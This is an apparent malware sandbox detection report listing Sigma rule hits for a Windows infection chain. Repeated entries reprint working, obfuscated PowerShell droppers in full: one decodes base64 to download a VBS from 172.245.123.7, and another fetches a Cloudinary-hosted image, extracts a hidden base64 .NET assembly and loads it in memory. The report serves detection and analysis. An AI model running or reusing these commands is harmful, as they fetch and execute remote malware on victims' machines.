                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnI
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , ProcessId: 7600, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline", ProcessId: 7544, ProcessName: csc.exe
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7392, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadrilog
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , ProcessId: 7600, ProcessName: wscript.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7392, TargetFilename: C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", CommandLine: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICA
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadrilog

                        Data Obfuscation

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = 